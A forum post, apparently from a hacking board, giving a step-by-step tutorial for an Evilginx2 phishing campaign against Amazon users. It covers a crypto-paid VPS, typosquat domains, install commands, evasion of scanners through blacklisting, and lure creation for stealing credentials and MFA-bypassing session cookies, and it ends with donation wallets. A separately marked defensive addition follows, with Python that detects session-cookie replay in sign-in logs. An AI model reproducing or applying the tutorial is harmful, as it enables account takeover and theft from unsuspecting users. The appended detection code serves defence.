OP 11 May, 2024 - 11:39 PM
(This post was last modified: 11 May, 2024 - 11:40 PM by BloodDiamond. Edited 1 time in total.)
Hello, I'm gonna start this off by saying this can either A. make you a shit load of money or B. get you thrown in jail, depends on what you do with your stolen data.
Step1: Get a server
The first step for any phishing campaign is acquiring a relatively cheap VPS to host your page. The best place for this is Panamaserver.com in my opinion. They let you pay with cryptocurrency (although not XMR sadly) so that's good, and the prices are really cheap. For your OS, choose Debian as that will work the best for this.
Step2: Get a phishing domain
In order to figure out what some phishing domains are, I recommend installing dnstwist on a Kali machine and running the domain of the site you're using in your attack through it to find available domains. I recommend using Namecheap to buy your domain as they have fairly cheap prices and won't ban it quickly which is always neat.
Step3(time to type): Installing Evilginx2
First off, Evilginx2 is a MiTM phishing framework that also steals session cookies, which can be used to bypass MFA.
To install this we need to run the following
First, Make sure wget is installed.
sudo apt update
sudo apt install wget -y
Next, we need to install Go.
wget https://golang.org/dl/go1.17.linux-amd64.tar.gz
Now we install Go.
sudo tar -zxvf go1.17.linux-amd64.tar.gz -C /usr/local/
Next, we configure PATH
echo "export PATH=/usr/local/go/bin:${PATH}" | sudo tee /etc/profile.d/go.sh
source /etc/profile.d/go.sh
Now we install Evilginx. I prefer this repo as it already has phishlets and saves you some time of hunting down/making your own.
sudo apt-get -y install git make
git clone https://github.com/BakkerJan/evilginx2.git
cd evilginx2
make
After this, Install Globally.
sudo make install
And now run.
sudo evilginx
Step4 Create Page.
Upon running, you will see a list of pages that are all disabled, pick your page of choice, but first we need to configure Evilginx so that we don't have problems
config domain <yourdomain>
config ip <yourIP>
blacklist unauth
The blacklist command is to block your site from scanners. YOU WANT TO DO THIS.
Next, pick your phishlet(phishing page) of choice
phishlets hostname amazon <your domain name>
phishlets enable amazon
Now it's time to set up our lure for this site. This is the actual phishing page itself.
lures create amazon
lures edit 0 redirect_url https://amazon.com
lures get-url 0
After running lures get-url 0 you should see a link appear on screen, this is your phishing link.
In another tutorial, I will teach you how to create an email server for spamming mass emails that will land in inbox.
If you have any questions, google it or ask chatgpt
good luck
If you find my posts useful please consider donating !
BITCOIN: 3GFWnF9G2vXtSi24p1saQGjPuJHenawLuY
XMR:82Z4kzrgaB6iV9C8QVStSWVosx9Wn6nu3WUQ9wwdJ4MKQSokRG1wDDLCdH5mpigW5JidAEH5VWZsbJFD9epJkNdf4gvJQj9
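From the defender's side, the session-cookie theft described in Step 3 leaves a recognisable trace in sign-in logs: the MFA login for a session arrives from one network and client, and the same session is then presented from a different network and a different client. The Python below is an added example, not part of the original post; the log format, field names and sample events are constructed for illustration.

```python
import json

# Constructed sample events (documentation IP ranges and reserved ASNs, not real logs).
SAMPLE_LOG = """\
{"ts": 1000, "user": "alice", "session": "s-1", "event": "login_mfa", "ip": "198.51.100.7", "asn": 64500, "ua": "Firefox/125"}
{"ts": 1300, "user": "alice", "session": "s-1", "event": "request", "ip": "198.51.100.9", "asn": 64500, "ua": "Firefox/125"}
{"ts": 2000, "user": "bob", "session": "s-2", "event": "login_mfa", "ip": "192.0.2.10", "asn": 64501, "ua": "Chrome/124"}
{"ts": 2120, "user": "bob", "session": "s-2", "event": "request", "ip": "203.0.113.50", "asn": 64502, "ua": "Firefox/115"}
{"ts": 2150, "user": "bob", "session": "s-2", "event": "request", "ip": "203.0.113.50", "asn": 64502, "ua": "Firefox/115"}
{"ts": 3000, "user": "carol", "session": "s-3", "event": "login_mfa", "ip": "198.51.100.20", "asn": 64500, "ua": "Safari/17"}
{"ts": 3600, "user": "carol", "session": "s-3", "event": "request", "ip": "203.0.113.80", "asn": 64503, "ua": "Safari/17"}
"""

def parse_events(text):
    """Parse one JSON event per non-empty line (assumed log format)."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]

def find_session_replay(events, window=86400):
    """Flag sessions reused from a different ASN *and* user agent than the MFA login.

    Requiring both to differ keeps roaming clients (same browser, new network)
    and same-network browser updates out of the alert queue.
    """
    origin, flagged, alerts = {}, set(), []
    for e in sorted(events, key=lambda ev: ev["ts"]):
        sid = e["session"]
        if e["event"] == "login_mfa":
            origin[sid] = e          # remember where MFA was completed
            continue
        first = origin.get(sid)
        if first is None or sid in flagged:
            continue                 # unknown session, or already alerted once
        if e["ts"] - first["ts"] > window:
            continue                 # outside the correlation window
        if e["asn"] != first["asn"] and e["ua"] != first["ua"]:
            flagged.add(sid)
            alerts.append({"user": e["user"], "session": sid,
                           "login_ip": first["ip"], "replay_ip": e["ip"],
                           "seconds_after_login": e["ts"] - first["ts"]})
    return alerts

if __name__ == "__main__":
    for alert in find_session_replay(parse_events(SAMPLE_LOG)):
        print(json.dumps(alert))
```

An alert from this check is a reason to revoke the session and reset the account's credentials; origin-bound authenticators such as FIDO2/WebAuthn stop the proxying step itself because the credential is tied to the legitimate domain.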